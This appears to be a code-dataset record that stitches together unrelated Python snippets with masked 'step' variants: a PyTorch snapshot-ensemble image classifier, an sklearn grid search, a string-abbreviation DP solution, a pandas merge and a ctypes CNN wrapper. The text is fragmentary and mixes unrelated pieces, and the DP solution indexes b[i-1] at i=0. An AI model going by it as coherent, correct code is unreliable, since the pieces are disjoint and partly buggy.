Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = 
img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport time\nimport os\nimport copy\nimport torch.nn.functional as F\nfrom PIL import Image, ExifTags\n\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes,\n device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype=torch.float32).to(\n device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype=torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, \n num_epochs_per_cycle * len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle - 1 and phase ==\n 'val'):\n prob[idx:idx + inputs.shape[0]] += F.softmax(\n outputs, dim=1)\n lbl[idx:idx + inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl)\n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n model_arr = []\n for weights in model_w_arr:\n model.load_state_dict(weights)\n model_arr.append(model)\n return model_arr, ensemble_loss, best_loss, prob\n\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype=np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim=1)\n res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis=0)\n res += res_arr\n return res / len(models_arr)\n\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n img = Image.open(os.path.join(p, lbl, fname))\n try:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = np.array(img.convert('RGB').resize((512, 512), Image.\n ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in 
os.listdir(p):\n img = Image.open(os.path.join(p, fname))\n try:\n if not 'DMWVNR' in fname:\n exif = dict((ExifTags.TAGS[k], v) for k, v in img._getexif(\n ).items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img = img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img = img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img = img.rotate(90, expand=True)\n except:\n pass\n img = img.convert('RGB').resize((512, 512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\n#import matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nimport torch.nn.functional as F\nfrom PIL import Image, ExifTags\n\ndef train_model_snapshot(model, criterion, lr, dataloaders, dataset_sizes, device, num_cycles, num_epochs_per_cycle):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_loss = 1000000.0\n model_w_arr = []\n prob = torch.zeros((dataset_sizes['val'], 3), dtype = torch.float32).to(device)\n lbl = torch.zeros((dataset_sizes['val'],), dtype = torch.long).to(device)\n for cycle in range(num_cycles):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9)#, weight_decay = 0.0005)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, num_epochs_per_cycle*len(dataloaders['train']))\n for epoch in range(num_epochs_per_cycle):\n #print('Cycle {}: Epoch {}/{}'.format(cycle, epoch, num_epochs_per_cycle - 1))\n #print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n idx = 0\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n if (epoch == num_epochs_per_cycle-1) and (phase == 'val'):\n prob[idx:idx+inputs.shape[0]] += F.softmax(outputs, dim = 1)\n lbl[idx:idx+inputs.shape[0]] = labels\n idx += inputs.shape[0]\n loss = criterion(outputs, labels)\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n scheduler.step()\n #print(optimizer.param_groups[0]['lr'])\n \n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n #print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n # phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'val' and epoch_loss < best_loss:\n best_loss = epoch_loss\n best_model_wts = copy.deepcopy(model.state_dict())\n #print()\n model_w_arr.append(copy.deepcopy(model.state_dict()))\n\n prob /= num_cycles\n ensemble_loss = F.nll_loss(torch.log(prob), lbl) \n ensemble_loss = ensemble_loss.item()\n time_elapsed = time.time() - since\n #print('Training complete in {:.0f}m {:.0f}s'.format(\n # time_elapsed // 60, time_elapsed % 60))\n #print('Ensemble Loss : {:4f}, Best val Loss: {:4f}'.format(ensemble_loss, best_loss))\n\n # load best model weights\n model_arr =[]\n for weights in model_w_arr:\n model.load_state_dict(weights) \n model_arr.append(model) \n return model_arr, ensemble_loss, best_loss, prob\n\ndef test(models_arr, loader, device):\n res = np.zeros((610, 3), dtype = np.float32)\n for model in models_arr:\n model.eval()\n res_arr = []\n for inputs, _ in loader:\n inputs = inputs.to(device)\n # forward\n # track history if only in train\n with torch.set_grad_enabled(False):\n outputs = F.softmax(model(inputs), dim = 1) \n 
res_arr.append(outputs.detach().cpu().numpy())\n res_arr = np.concatenate(res_arr, axis = 0)\n res += res_arr\n return res / len(models_arr)\n\ndef read_train_data(p):\n imgs = []\n labels = []\n for i, lbl in enumerate(os.listdir(p)):\n for fname in os.listdir(os.path.join(p, lbl)):\n #read image\n img = Image.open(os.path.join(p, lbl, fname))\n #rotate image to original view\n try:\n exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img=img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img=img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img=img.rotate(90, expand=True)\n except:\n pass\n #resize all images to the same size\n img = np.array(img.convert('RGB').resize((512,512), Image.ANTIALIAS))\n imgs.append(img)\n labels.append(i)\n return imgs, labels\n\ndef read_test_data(p):\n imgs = []\n labels = []\n ids = []\n for fname in os.listdir(p):\n #read image\n img = Image.open(os.path.join(p, fname))\n #rotate image to original view\n try:\n if not('DMWVNR' in fname):\n exif=dict((ExifTags.TAGS[k], v) for k, v in img._getexif().items() if k in ExifTags.TAGS)\n if exif['Orientation'] == 3:\n img=img.rotate(180, expand=True)\n elif exif['Orientation'] == 6:\n img=img.rotate(270, expand=True)\n elif exif['Orientation'] == 8:\n img=img.rotate(90, expand=True)\n except:\n pass\n #resize all images to the same size\n img = img.convert('RGB').resize((512,512), Image.ANTIALIAS)\n imgs.append(np.array(img.copy()))\n labels.append(0)\n ids.append(fname.split('.')[0])\n img.close()\n return imgs, labels, ids\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
    Write a program that takes a string
    and prints the string without spaces and its length.
    Implement a separate helper function for removing the spaces.
"""
|
normal
|
{
"blob_id": "1eab2ddda6fdd71db372e978caa6e7d24c7fe78e",
"index": 7724,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\n Написать программу, которая принимает строку\n и выводит строку без пробелов и ее длину.\n Для удаления пробелов реализовать доп функцию.\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from os import path
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.pipeline import Pipeline
from sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset
from sklearn.model_selection import GridSearchCV
from sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier
from multiprocessing import cpu_count
n_jobs = max(1, cpu_count()-1)
test_size = 0.20
X, y, quantitatives = load_train_dataset()
# Manual aggregation
pipe, search_grid = get_voting_classifier()
# pipes, search_grid = get_svm()
# pipe = Pipeline(pipes)
cv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)
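# Exhaustive search over the pipeline's hyper-parameter grid, scored by accuracy on the
# stratified shuffle-split folds above and refit on the full training set afterwards.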
grid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs, return_train_score=True, refit=True, scoring="accuracy")
grid.fit(X, y)
parameters = get_best_hyper_parameters(grid)
print("Result for {} configurations".format(len(parameters)))
for p in parameters:
print("{};{:.2f}%;{:.4f}%;±{:.4f}%".format(
", ".join(map(lambda k: "{}={}".format(k.split("__")[1], p["params"][k]), p["params"].keys())),
100.0 * p["mean_train_score"],
100.0 * p["mean_test_score"],
200.0 * p["std_test_score"]
))
# print("Results: Train: {:.2f}%, Test: {:.2f}% std:{:.4f} for {}".format(100 * p["mean_train_score"], 100 * p["mean_test_score"], p["std_test_score"], p["params"]))
prediction_file = "{}/predictions.csv".format(path.dirname(path.abspath(__file__)))
pred = grid.predict(load_test_dataset())
f = open(prediction_file, "w")
f.write("\n".join(map(lambda o: str(o), pred)))
f.close()
|
normal
|
{
"blob_id": "c99878dbd5610c8a58f00912e111b1eef9d3893e",
"index": 7782,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngrid.fit(X, y)\n<mask token>\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\n<mask token>\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-3": "<mask token>\nn_jobs = max(1, cpu_count() - 1)\ntest_size = 0.2\nX, y, quantitatives = load_train_dataset()\npipe, search_grid = get_voting_classifier()\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs,\n return_train_score=True, refit=True, scoring='accuracy')\ngrid.fit(X, y)\nparameters = get_best_hyper_parameters(grid)\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\nprediction_file = '{}/predictions.csv'.format(path.dirname(path.abspath(\n __file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, 'w')\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-4": "from os import path\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.pipeline import Pipeline\nfrom sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset\nfrom sklearn.model_selection import GridSearchCV\nfrom sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier\nfrom multiprocessing import cpu_count\nn_jobs = max(1, cpu_count() - 1)\ntest_size = 0.2\nX, y, quantitatives = load_train_dataset()\npipe, search_grid = get_voting_classifier()\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs,\n return_train_score=True, refit=True, scoring='accuracy')\ngrid.fit(X, y)\nparameters = get_best_hyper_parameters(grid)\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\nprediction_file = '{}/predictions.csv'.format(path.dirname(path.abspath(\n __file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, 'w')\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-5": "from os import path\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.pipeline import Pipeline\nfrom sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset\nfrom sklearn.model_selection import GridSearchCV\nfrom sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier\nfrom multiprocessing import cpu_count\n\n\nn_jobs = max(1, cpu_count()-1)\ntest_size = 0.20\n\nX, y, quantitatives = load_train_dataset()\n\n# Manual aggregation\npipe, search_grid = get_voting_classifier()\n\n# pipes, search_grid = get_svm()\n# pipe = Pipeline(pipes)\n\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs, return_train_score=True, refit=True, scoring=\"accuracy\")\ngrid.fit(X, y)\n\nparameters = get_best_hyper_parameters(grid)\nprint(\"Result for {} configurations\".format(len(parameters)))\nfor p in parameters:\n print(\"{};{:.2f}%;{:.4f}%;±{:.4f}%\".format(\n \", \".join(map(lambda k: \"{}={}\".format(k.split(\"__\")[1], p[\"params\"][k]), p[\"params\"].keys())),\n 100.0 * p[\"mean_train_score\"],\n 100.0 * p[\"mean_test_score\"],\n 200.0 * p[\"std_test_score\"]\n ))\n\n # print(\"Results: Train: {:.2f}%, Test: {:.2f}% std:{:.4f} for {}\".format(100 * p[\"mean_train_score\"], 100 * p[\"mean_test_score\"], p[\"std_test_score\"], p[\"params\"]))\n\nprediction_file = \"{}/predictions.csv\".format(path.dirname(path.abspath(__file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, \"w\")\nf.write(\"\\n\".join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
You can perform the following operations on the string a:
Capitalize zero or more of a's lowercase letters.
Delete all of the remaining lowercase letters in a.
Given two strings, a and b, determine if it's possible to make a equal to b as described. If so, print YES on a new line. Otherwise, print NO.
For example, given a = daBcd and b = ABC, we can capitalize a and c in a and delete the remaining lowercase letters to match b; matching is impossible whenever it would require changing a letter, because letters may only be capitalized or discarded, not changed.
Function Description
Complete the abbreviation function in the editor below. It must return either YES or NO.
abbreviation has the following parameter(s):
a: the string to modify
b: the string to match
Input Format
The first line contains a single integer q, the number of queries.
Each of the next q pairs of lines is as follows:
- The first line of each query contains a single string, a.
- The second line of each query contains a single string, b.
Constraints
String a consists only of uppercase and lowercase English letters, ascii[A-Za-z].
String b consists only of uppercase English letters, ascii[A-Z].
Output Format
For each query, print YES on a new line if it's possible to make string a equal to string b. Otherwise, print NO.
Sample Input
1
daBcd
ABC
Sample Output
YES
Explanation
We have a = daBcd and b = ABC. We perform the following operations:
Capitalize the letters a and c in a so that a = dABCd.
Delete all the remaining lowercase letters in a so that a = ABC.
Because we were able to successfully convert a to b, we print YES on a new line.
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the abbreviation function below.
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [[False]*(m+1) for _ in range(n+1)]
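    # dp[i][j] is True when the first j characters of a can be transformed
    # into the first i characters of b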
dp[0][0] = True
for i in range(n+1):
for j in range(1,m+1):
if a[j-1] == b[i-1]:
dp[i][j] = dp[i-1][j-1]
elif a[j-1].upper() == b[i-1]:
dp[i][j] = dp[i-1][j-1] or dp[i][j-1]
elif a[j-1].islower():
dp[i][j] = dp[i][j-1]
return "YES" if dp[n][m] else "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
|
normal
|
{
"blob_id": "5fb998fa761b989c6dd423634824197bade4f8a5",
"index": 23,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n",
"step-4": "<mask token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n",
"step-5": "\"\"\"\nYou can perform the following operations on the string, :\n\nCapitalize zero or more of 's lowercase letters.\nDelete all of the remaining lowercase letters in .\nGiven two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.\n\nFor example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.\n\nFunction Description\n\nComplete the function in the editor below. It must return either or .\n\nabbreviation has the following parameter(s):\n\na: the string to modify\nb: the string to match\nInput Format\n\nThe first line contains a single integer , the number of queries.\n\nEach of the next pairs of lines is as follows:\n- The first line of each query contains a single string, .\n- The second line of each query contains a single string, .\n\nConstraints\n\nString consists only of uppercase and lowercase English letters, ascii[A-Za-z].\nString consists only of uppercase English letters, ascii[A-Z].\nOutput Format\n\nFor each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.\n\nSample Input\n\n1\ndaBcd\nABC\nSample Output\n\nYES\nExplanation\n\nimage\n\nWe have daBcd and ABC. We perform the following operation:\n\nCapitalize the letters a and c in so that dABCd.\nDelete all the remaining lowercase letters in so that ABC.\nBecause we were able to successfully convert to , we print YES on a new line.\n\n\n\"\"\"\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the abbreviation function below.\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [[False]*(m+1) for _ in range(n+1)]\n dp[0][0] = True\n for i in range(n+1):\n for j in range(1,m+1):\n if a[j-1] == b[i-1]:\n dp[i][j] = dp[i-1][j-1]\n elif a[j-1].upper() == b[i-1]:\n dp[i][j] = dp[i-1][j-1] or dp[i][j-1]\n elif a[j-1].islower():\n dp[i][j] = dp[i][j-1]\n return \"YES\" if dp[n][m] else \"NO\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n a = input()\n\n b = input()\n\n result = abbreviation(a, b)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
df1 = pd.read_csv("../final/your_no.tsv", sep='\t')
df2 = pd.read_csv("../../Downloads/me.csv", sep='\t')
final = pd.concat([df1, df2])
final.to_csv('../../Downloads/final_con_final.tsv', sep='\t', index=False)
|
normal
|
{
"blob_id": "cd5945631a9dd505bf67089bab8c5a37ad375129",
"index": 410,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-3": "<mask token>\ndf1 = pd.read_csv('../final/your_no.tsv', '\\t')\ndf2 = pd.read_csv('../../Downloads/me.csv', '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-4": "import pandas as pd\ndf1 = pd.read_csv('../final/your_no.tsv', '\\t')\ndf2 = pd.read_csv('../../Downloads/me.csv', '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-5": "import pandas as pd \ndf1 = pd.read_csv(\"../final/your_no.tsv\", '\\t')\ndf2 = pd.read_csv(\"../../Downloads/me.csv\", '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import time,pickle
from CNN_GPU.CNN_C_Wrapper import *
from pathlib import Path
FSIGMOIG = 0
FTANH = 2
FRELU = 4
REQUEST_INPUT = 0
REQUEST_GRAD_INPUT = 1
REQUEST_OUTPUT = 2
REQUEST_WEIGTH = 3
class CNN:
def __init__(self, inputSize, hitLearn=.1, momentum=.9, weigthDecay=.5, multip=1.0):
file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')
file = file.encode('utf-8')
self.cnn = c_Pointer()
clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer(file),
hitLearn, momentum, weigthDecay, multip, inputSize[0], inputSize[1], inputSize[2])
clib.initRandom(time.time_ns())
def __del__(self):
clib.releaseCnnWrapper(c.addressof(self.cnn))
print('end')
def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):
clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)
def addPoolLayer(self, passo, tamanhoFitro):
clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)
def addReluLayer(self):
clib.CnnAddReluLayer(self.cnn.p)
def addDropOutLayer(self, pontoAtivacao, seed):
clib.CnnAddDropOutLayer(self.cnn.p, pontoAtivacao, seed)
def addFullConnectLayer(self, saida, funcaoAtivacao):
clib.CnnAddFullConnectLayer(self.cnn.p, saida, funcaoAtivacao)
def predict(self, input):
tinput = self.createInp(*input)
clib.CnnCall(self.cnn.p, tinput)
def learn(self, target):
ttarg = self.targ(*target)
clib.CnnLearn(self.cnn.p, ttarg)
def getData(self, layer, request, nfilter=0):
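        # request selects which tensor to copy back: REQUEST_INPUT, REQUEST_GRAD_INPUT,
        # REQUEST_OUTPUT or REQUEST_WEIGTH (see the constants at the top of this module)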
size = self.getSizeData(layer, request)
if size is None: return None
data = c.c_double * (size[0] * size[1] * size[2])
data = data(0)
err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)
if err < 0:
self.lastERROR = err
return None
return list(data)
def getSizeData(self, layer, request):
inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)
err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.addressof(n))
if err < 0:
self.lastERROR = err
return None
return inx.value, iny.value, inz.value, n.value
@property
def output(self):
err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out)
if err < 0:
self.lastERROR = err
return None
return list(self.out)
def compile(self):
        if self.error: raise Exception(self.errorMsg)
inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)
err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.cast(0, c.c_void_p))
if err != 0: raise Exception('Error when request input size', err)
self.createInp = c.c_double * (inx.value * iny.value * inz.value)
err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.cast(0, c.c_void_p))
if err != 0: raise Exception('Error when request output size', err)
self.out = c.c_double * (inx.value * iny.value * inz.value)
self.targ = self.out
self.out = self.out(0)
def info(self):
clib.CnnInfo(self.cnn.p)
def save(self, fileName:str):
filedesc = Path(fileName).with_suffix('.cdc')
self.salveCnnDescriptor(filedesc)
fileName = fileName.encode('utf-8')
return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))
@staticmethod
def load(fileName):
self = CNN([2,2,1])
fileName = fileName.encode('utf-8')
clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))
self.compile()
return self
@property
def error(self):
return clib.getCnnError(self.cnn.p)
@property
def errorMsg(self):
buff = c.create_string_buffer(''.encode('utf-8'),255)
clib.getCnnErrormsg(self.cnn.p,buff)
return buff.value.decode('utf-8')
def salveCnnDescriptor(self,file):
desc_c = c_Pointer()
clib.generateDescriptor(c.addressof(desc_c),self.cnn.p)
msg = c.cast(desc_c.p,c.c_char_p)
msg = msg.value.decode('utf-8')
clib.freeP(desc_c.p)
desc = eval(msg)
with open(file,'wb') as f:
pickle.dump(desc,f)
    # AUXILIARY FUNCTIONS
def getOutputAsIndexMax(self):
ans = clib.CnnGetIndexMax(self.cnn.p)
return ans
def normalizeVector(self,vector:list,maxOutput,minOutput):
out_TYPE =c.c_double * len(vector)
inp = out_TYPE(*vector)
out = out_TYPE()
clib.normalizeGPU(self.cnn.p,inp,out,len(vector),maxOutput,minOutput)
return list(out)
def normalizeVectorKnowedSpace(self,vector:list,maxInput,minInput,maxOutput,minOutput):
out_TYPE =c.c_double * len(vector)
tmp_inp = out_TYPE(*vector)
tmp_out = out_TYPE(*vector)
clib.normalizeGPUSpaceKnow(self.cnn.p,tmp_inp,tmp_out,len(vector),maxInput,minInput,maxOutput,minOutput)
return list(tmp_out)
def getOutPutAsPPM(self):
p = c_Pointer()
h = c.c_size_t()
w = c.c_size_t()
clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h), c.addressof(w))
h = h.value
w = w.value
out = (c.c_ubyte*(w*h))()
c.memmove(out,p.p,w*h)
a = bytes(out)
clib.freeP(p.p)
return (h,w,a)
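
# Minimal usage sketch (illustrative only: layer sizes and the input data are assumptions,
# and the compiled C library plus gpu_function.cl must be available for CNN() to work):
#
#   net = CNN([28, 28, 1])                 # 28x28 single-channel input
#   net.addConvLayer(1, 5, 6)              # stride 1, 5x5 filters, 6 filters
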